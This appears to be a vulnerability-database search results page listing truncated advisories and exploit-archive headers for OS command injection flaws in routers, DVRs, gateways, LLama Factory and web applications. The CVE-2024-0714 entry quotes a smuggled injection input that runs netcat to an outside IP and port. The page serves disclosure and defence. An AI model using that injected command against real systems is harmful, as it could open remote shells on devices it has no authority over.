22 matches found
CVE-2019-7632
LifeSize Team, Room, Passport, and Networker 220 devices allow Authenticated Remote OS Command Injection, as demonstrated by shell metacharacters in the support/mtusize.php mtusize parameter. The lifesize default password for the cli account may sometimes be used for authentication...
EUVD-2019-17165
Malware in sbrugna...
CVE-2025-5444
A vulnerability has been found in Linksys RE6500, RE6250, RE6300, RE6350, RE7000 and RE9000 1.0.013.001/1.0.04.001/1.0.04.002/1.1.05.003/1.2.07.001 and classified as critical. Affected by this vulnerability is the function RPUpgradeFWByBBS of the file /goform/RPUpgradeFWByBBS. The manipulation of...
CVE-2024-3721
A vulnerability was found in TBK DVR-4104 and DVR-4216 up to 20240412 and classified as critical. This issue affects some unknown processing of the file /device.rsp?opt=sys=SOSTREAMAX. The manipulation of the argument mdb/mdc leads to os command injection. The attack may be initiated remotely. Th...
CVE-2025-1608
A vulnerability, which was classified as critical, was found in LB-LINK AC1900 Router 1.0.2. Affected is the function websGetVar of the file /goform/setmanpwd. The manipulation of the argument routepwd leads to os command injection. It is possible to launch the attack remotely. The exploit has...
CVE-2025-1536
A vulnerability was found in Raisecom Multi-Service Intelligent Gateway up to 20250208. It has been declared as critical. This vulnerability affects unknown code of the file /vpn/vpntemplatestyle.php of the component Request Parameter Handler. The manipulation of the argument stylenum leads to os...
GHSA-HJ3W-WRH4-44VP LLama Factory Remote OS Command Injection Vulnerability
Summary A critical remote OS command injection vulnerability has been identified in the Llama Factory training process. This vulnerability arises from improper handling of user input, allowing malicious actors to execute arbitrary OS commands on the host system. The issue is caused by insecure...
CVE-2024-52803
LLama Factory enables fine-tuning of large language models. A critical remote OS command injection vulnerability has been identified in the LLama Factory training process. This vulnerability arises from improper handling of user input, allowing malicious actors to execute arbitrary OS commands on...
CVE-2024-52803 LLama Factory Remote OS Command Injection Vulnerability
LLama Factory enables fine-tuning of large language models. A critical remote OS command injection vulnerability has been identified in the LLama Factory training process. This vulnerability arises from improper handling of user input, allowing malicious actors to execute arbitrary OS commands on...
CVE-2024-52803
CVE-2024-52803 affects LLama Factory, where the training process is vulnerable to a remote OS command injection due to insecure use of Popen with shell=True and unsanitized user input. The issue allows an attacker to execute arbitrary OS commands on the host, with impact described as high for con...
CVE-2024-4509
CVE-2024-4509 affects Ruijie RG-UAC up to 20240428. The vulnerability is an OS command injection in the PHP endpoint /view/IPV6/naborTable/add_commit.php, triggered by manipulating the ip_addr/mac_addr arguments. It can be exploited remotely, and public disclosure of the exploit is noted. Affecte...
CVE-2024-4507
A vulnerability was found in Ruijie RG-UAC up to 20240428 and classified as critical. This issue affects some unknown processing of the file /view/IPV6/ipv6StaticRoute/staticrouteaddipv6.php. The manipulation of the argument textprefixlen/textgateway/devname leads to os command injection. The...
CVE-2024-3346
Byzoro Smart S80 (up to 20240328) contains an OS command injection vulnerability in /log/webmailattach.php via the mail_file_path parameter. This can be exploited remotely; the exploit has been disclosed publicly (VDB-259450). Affected product/version information is limited to the Byzoro Smart S8...
CVE-2024-0714
A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 ...
Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection
Exploit Title: Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection Date: 21.09.2021 Exploit Author: LiquidWorm Vendor Homepage: https://www.cypress.bc.ca Cypress Solutions CTM-200 2.7.1 Root Remote OS Command Injection Vendor: Cypress Solutions Inc. Product web page:...
IBM Tealeaf CX 8.8 - Remote OS Command Injection Vulnerability
Exploit for php platform in category web applications IBM Tealeaf CX v8 release 8 Remote OS Command Injection Date: 11/08/2013 Exploit author: drone More information: http://www-01.ibm.com/support/docview.wss?uid=swg21667630 Vendor homepage: http://www-01.ibm.com/software/info/tealeaf/ Version:...
IBM Tealeaf CX 8.8 - Remote OS Command Injection
IBM Tealeaf CX 8.8 - Remote OS Command Injection IBM Tealeaf CX v8 release 8 Remote OS Command Injection Date: 11/08/2013 Exploit author: drone More information: http://www-01.ibm.com/support/docview.wss?uid=swg21667630 Vendor homepage: http://www-01.ibm.com/software/info/tealeaf/ Version: Versio...
IBM Tealeaf CX 8.8 - Remote OS Command Injection
IBM Tealeaf CX v8 release 8 Remote OS Command Injection Date: 11/08/2013 Exploit author: drone More information: http://www-01.ibm.com/support/docview.wss?uid=swg21667630 Vendor homepage: http://www-01.ibm.com/software/info/tealeaf/ Version: Version 8 Release 8 likely all versions prior Tested on...
Webuzo 2.1.3 - Multiple Vulnerabilities
Exploit for php platform in category web applications Exploit Title: Webuzo Multiple Vulnerabilities Date: 7 October 2013 Exploit Author: Mahendra Vendor Homepage: www.webuzo.com Software Link: http://downloads.webuzo.com/va.php Version: 2.1.3, other version might be vulnerable. Tested on: CentOS...
Webuzo 2.1.3 - Multiple Vulnerabilities
Exploit Title: Webuzo Multiple Vulnerabilities Date: 7 October 2013 Exploit Author: Mahendra Vendor Homepage: www.webuzo.com Software Link: http://downloads.webuzo.com/va.php Version: 2.1.3, other version might be vulnerable. Tested on: CentOS release 6.2 FINAL CVE : CVE-2013-6041, CVE-2013-6042,...